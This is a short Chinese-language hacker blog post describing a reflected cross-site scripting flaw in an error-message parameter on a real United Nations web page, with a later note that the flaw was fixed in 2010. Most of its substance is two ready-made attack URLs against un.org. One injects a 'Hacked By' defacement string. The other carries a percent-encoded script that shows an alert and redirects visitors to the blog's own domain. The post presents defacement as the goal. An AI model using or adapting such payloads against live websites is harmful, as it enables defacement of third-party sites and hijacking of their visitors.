【技巧】联合国网站一个小小的Bug

  • A+
所属分类:lcx

    蛋疼的“伟大娃娃”发现的。

    实际上原理非常简单,应该是自定义返回信息没有做任何过滤这类的,根本不存在任何漏洞不漏洞的问题。这种事经常有,百度也有的,百度好几个站都有~~~

    例如编写一个404页面专门处理返回错误信息,其他页面若是执行出错后,会调用这个页面。调用的过程会提交一些具体的错误信息参数,例如:404.ASP?coke=我出错啦!。若是这个:“我出错啦!”没过滤的话,就可以被利用了,例如:404.ASP?coke=hacker by hack!。运气好的话,可以直接提交html代码返回执行,直接挂黑页。

文字式:

    http://www.un.org/docs/journal/asp/ws.asp?m=Hacked%20By%20Nuclear'Atk

执行java代码,弹窗+跳转:

    http://www.un.org/docs/journal/asp/ws.asp?m=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%48%61%63%6B%65%64%20%42%79%20%4E%75%63%6C%65%61%72%27%41%74%6B%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%27%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%27%3C%2F%73%63%72%69%70%74%3E

    后记:2010-8-31 0:28:04 经测试,已修复执行html代码bug,提交代码被Html编码后输出。

文章来源于lcx.cc:【技巧】联合国网站一个小小的Bug

相关推荐: 第三章 南极冰层三千米下的秘密基地

    前一章,《第二章 秘密“招聘”》:https://lcx.cc/post/1324/     一周后,April 8, 2010,地点:南极洲某处。     “先生们,女士们,起床了!”     “我是船长James Kyson,很荣幸的通知各位,我们…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: